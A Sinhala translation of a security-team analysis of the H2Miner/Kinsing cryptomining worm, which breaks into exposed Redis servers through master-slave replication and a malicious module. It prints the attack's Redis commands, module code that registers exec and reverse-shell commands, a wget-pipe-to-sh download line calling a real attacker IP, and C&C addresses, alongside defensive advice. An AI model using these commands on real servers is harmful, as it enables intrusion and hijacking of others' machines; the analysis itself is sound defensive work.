දිනකට පෙර, මගේ ව්යාපෘතියේ එක් සේවාදායකයකට සමාන පණුවෙකු විසින් පහර දෙන ලදී. "ඒ කුමක්ද?" යන ප්රශ්නයට පිළිතුරක් සෙවීමේදී අලිබබා ක්ලවුඩ් සිකියුරිටි කණ්ඩායමේ නියම ලිපියක් මට හමු විය. මම මෙම ලිපිය Habré හි සොයා නොගත් නිසා, මම එය විශේෂයෙන් ඔබ වෙනුවෙන් පරිවර්තනය කිරීමට තීරණය කළෙමි <3
පිවිසුම්
මෑතකදී, Alibaba Cloud හි ආරක්ෂක කණ්ඩායම H2Miner හි හදිසි පිපිරීමක් සොයා ගන්නා ලදී. මෙම වර්ගයේ අනිෂ්ට පණුවන් රෙඩිස් සඳහා අවසර නොමැතිකම හෝ දුර්වල මුරපද ඔබේ පද්ධති සඳහා ද්වාර ලෙස භාවිතා කරයි, ඉන්පසු එය මාස්ටර්-ස්ලේව් සමමුහුර්තකරණය හරහා වහලා සමඟ තමන්ගේම අනිෂ්ට මොඩියුලය සමමුහුර්ත කර අවසානයේ මෙම අනිෂ්ට මොඩියුලය ප්රහාරයට ලක් වූ යන්ත්රයට බාගත කර අනිෂ්ට ක්රියාත්මක කරයි. උපදෙස්.
අතීතයේදී, ප්රහාරකයා Redis වෙත ප්රවිෂ්ට වීමෙන් පසුව ඔබේ යන්ත්රයට ලියා ඇති කාලසටහන්ගත කාර්යයන් හෝ SSH යතුරු ඇතුළත් ක්රමයක් භාවිතයෙන් ඔබේ පද්ධතිවලට ප්රහාර මූලික වශයෙන් සිදු කරන ලදී. වාසනාවකට මෙන්, අවසර පාලනයේ ගැටළු හේතුවෙන් හෝ විවිධ පද්ධති අනුවාද හේතුවෙන් මෙම ක්රමය බොහෝ විට භාවිතා කළ නොහැක. කෙසේ වෙතත්, අනිෂ්ට මොඩියුලයක් පැටවීමේ මෙම ක්රමය මඟින් ප්රහාරකයාගේ විධාන සෘජුවම ක්රියාත්මක කිරීමට හෝ ඔබේ පද්ධතියට භයානක වන කවචයට ප්රවේශය ලබා ගත හැකිය.
අන්තර්ජාලයේ ඇති රෙඩිස් සේවාදායකයන් විශාල සංඛ්යාවක් (මිලියන 1 කට ආසන්න) නිසා, Alibaba Cloud හි ආරක්ෂක කණ්ඩායම, මිත්රශීලී මතක් කිරීමක් ලෙස, පරිශීලකයන් Redis සමඟ අමුත්තන් බෙදා නොගන්නා ලෙසත්, ඔවුන්ගේ මුරපදවල ප්රබලතාව සහ ඒවා සම්මුතියකට ලක් වී ඇත්දැයි නිරන්තරයෙන් පරීක්ෂා කරන ලෙසත් නිර්දේශ කරයි. ඉක්මන් තේරීම.
H2Miner
H2Miner යනු Hadoop නූල්, Docker සහ Redis දුරස්ථ විධාන ක්රියාත්මක කිරීමේ (RCE) දුර්වලතා ඇතුළුව විවිධ ආකාරවලින් ඔබේ පද්ධතිය ආක්රමණය කළ හැකි Linux මත පදනම් වූ පද්ධති සඳහා වන පතල් botnet එකකි. botnet එකක් ක්රියා කරන්නේ ඔබේ දත්ත කැණීමට, ප්රහාරය තිරස් අතට පුළුල් කිරීමට සහ විධාන සහ පාලන (C&C) සන්නිවේදනයන් පවත්වා ගැනීමට අනිෂ්ට ස්ක්රිප්ට් සහ අනිෂ්ට මෘදුකාංග බාගත කිරීමෙනි.
රෙඩිස් RCE
මෙම විෂය පිළිබඳ දැනුම Pavel Toporkov විසින් ZeroNights 2018 හිදී බෙදා ගන්නා ලදී. 4.0 අනුවාදයෙන් පසුව, Redis විසින් පරිශීලකයින්ට පූරණය කිරීමේ හැකියාව ලබා දෙන ප්ලග්-ඉන් පැටවීමේ විශේෂාංගයකට සහය දක්වයි, එබැවින් නිශ්චිත Redis විධාන ක්රියාත්මක කිරීම සඳහා C සමඟින් සම්පාදනය කරන ලද ගොනු Redis වෙත පූරණය කිරීමට හැකියාව ලබා දේ. මෙම ශ්රිතය, ප්රයෝජනවත් වුවත්, මාස්ටර්-ස්ලේව් ප්රකාරයේදී, ෆුල් රෙසින්ක් ප්රකාරය හරහා ස්ලේව් සමඟ ගොනු සමමුහුර්ත කළ හැකි අවදානමක් අඩංගු වේ. මෙය ප්රහාරකයෙකුට අනිෂ්ට ගොනු මාරු කිරීමට භාවිතා කළ හැක. මාරු කිරීම අවසන් වූ පසු, ප්රහාරකයන් විසින් මොඩියුලය ප්රහාරයට ලක් වූ Redis අවස්ථාවට පටවා ඕනෑම විධානයක් ක්රියාත්මක කරයි.
අනිෂ්ට මෘදුකාංග වර්ම් විශ්ලේෂණය
මෑතකදී, Alibaba Cloud ආරක්ෂක කණ්ඩායම විසින් H2Miner අනිෂ්ට මයිනර් සමූහයේ ප්රමාණය හදිසියේම නාටකාකාර ලෙස වැඩි වී ඇති බව සොයා ගන්නා ලදී. විශ්ලේෂණයට අනුව, ප්රහාරයේ සාමාන්ය ක්රියාවලිය පහත පරිදි වේ:
H2Miner පූර්ණ ප්රහාරයක් සඳහා RCE Redis භාවිතා කරයි. ප්රහාරකයින් පළමුව ප්රහාර එල්ල කරන්නේ අනාරක්ෂිත Redis සේවාදායකයන්ට හෝ දුර්වල මුරපද සහිත සේවාදායකයන්ට ය.
එවිට ඔවුන් විධානය භාවිතා කරයි config set dbfilename red2.so ගොනු නාමය වෙනස් කිරීමට. මෙයින් පසු, ප්රහාරකයින් විධානය ක්රියාත්මක කරයි slaveof මාස්ටර්-ස්ලේව් අනුරූ ධාරක ලිපිනය සැකසීමට.
ප්රහාරයට ලක් වූ Redis අවස්ථාව ප්රහාරකයා සතු අනිෂ්ට Redis සමඟ ප්රධාන වහල් සම්බන්ධතාවයක් ඇති කර ගත් විට, ප්රහාරකයා විසින් ගොනු සමමුහුර්ත කිරීම සඳහා fullresync විධානය භාවිතයෙන් ආසාදිත මොඩියුලය යවයි. එවිට red2.so ගොනුව ප්රහාරයට ලක් වූ යන්ත්රයට බාගත කරනු ඇත. එවිට ප්රහාරකයන් මෙම so ගොනුව පූරණය කිරීමට ./red2.so loading module භාවිතා කරයි. මොඩියුලයට ප්රහාරකයෙකුගෙන් විධාන ක්රියාත්මක කිරීමට හෝ ප්රහාරයට ලක් වූ යන්ත්රයට ප්රවේශය ලබා ගැනීම සඳහා ප්රතිලෝම සම්බන්ධතාවයක් (පසුපස දොර) ආරම්භ කළ හැක.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
වැනි අනිෂ්ට විධානයක් ක්රියාත්මක කිරීමෙන් පසු / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ප්රහාරකයා උපස්ථ ගොනු නාමය යළි සකසනු ඇති අතර අංශු පිරිසිදු කිරීමට පද්ධති මොඩියුලය බානු ඇත. කෙසේ වෙතත්, red2.so ගොනුව තවමත් ප්රහාරක යන්ත්රය මත පවතිනු ඇත. ඔවුන්ගේ Redis උදාහරණයේ ෆෝල්ඩරයේ එවැනි සැක සහිත ගොනුවක් තිබීම ගැන අවධානය යොමු කරන ලෙස පරිශීලකයින්ට උපදෙස් දෙනු ලැබේ.
සම්පත් සොරකම් කිරීම සඳහා සමහර ද්වේෂසහගත ක්රියාවලීන් විනාශ කිරීමට අමතරව, ප්රහාරකයා අනිෂ්ට ද්විමය ගොනු බාගත කර ක්රියාත්මක කිරීමෙන් අනිෂ්ට පිටපතක් අනුගමනය කළේය. . මෙයින් අදහස් කරන්නේ ධාරකයේ kinsing අඩංගු ක්රියාවලි නාමය හෝ නාමාවලියේ නම එම යන්ත්රය මෙම වෛරසයෙන් ආසාදනය වී ඇති බව පෙන්නුම් කළ හැකි බවයි.
ප්රතිලෝම ඉංජිනේරු ප්රතිඵලවලට අනුව, අනිෂ්ට මෘදුකාංග ප්රධාන වශයෙන් පහත සඳහන් කාර්යයන් ඉටු කරයි:
- ගොනු උඩුගත කිරීම සහ ඒවා ක්රියාත්මක කිරීම
- පතල් කැණීම
- C&C සන්නිවේදනය පවත්වාගෙන යාම සහ ප්රහාරක විධාන ක්රියාත්මක කිරීම
ඔබේ බලපෑම පුළුල් කිරීමට බාහිර ස්කෑන් කිරීම සඳහා masscan භාවිතා කරන්න. මීට අමතරව, C&C සේවාදායකයේ IP ලිපිනය වැඩසටහන තුළ දැඩි ලෙස කේතනය කර ඇති අතර, ප්රහාරයට ලක් වූ ධාරකය HTTP ඉල්ලීම් භාවිතා කරමින් C&C සන්නිවේදන සේවාදායකය සමඟ සන්නිවේදනය කරනු ඇත, එහිදී HTTP ශීර්ෂය තුළ zombie (සම්මුතියට පත් සේවාදායකය) තොරතුරු හඳුනා ගනී.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
වෙනත් ප්රහාර ක්රම
පණුවා විසින් භාවිතා කරන ලිපින සහ සබැඳි
/ kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
ඉඟිය
පළමුව, Redis අන්තර්ජාලයෙන් ප්රවේශ විය නොහැකි අතර ශක්තිමත් මුරපදයකින් ආරක්ෂා කළ යුතුය. රෙඩිස් ඩිරෙක්ටරියේ red2.so ගොනුවක් නොමැති බව සහ ධාරකයේ ගොනු/ක්රියාවලි නාමයේ "kinsing" නොමැති බව සේවාදායකයින් විසින් පරීක්ෂා කිරීම ද වැදගත් වේ.
මූලාශ්රය: www.habr.com